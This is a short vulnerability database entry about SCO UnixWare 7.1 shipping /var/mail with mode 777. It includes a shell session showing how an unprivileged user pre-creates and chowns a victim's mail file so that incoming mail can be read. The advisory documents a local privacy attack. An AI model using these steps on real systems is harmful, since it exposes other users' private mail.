SCO Unixware 7.1 '/var/mail' permissions Vulnerability

ID SSV:73573
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


Certain versions of SCO's UnixWare (only 7.1 was tested) ship with the /var/mail/
directory with permission 777(-rwxrwxrwx) . This in effect allows malicious users to read incoming mail for users who do not yet have a mail file (/var/mail/username) present. This may be done by simply creating the file in question with a permission mode which is readable to the attacker. 

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier

Now wait for btellier to get some mail...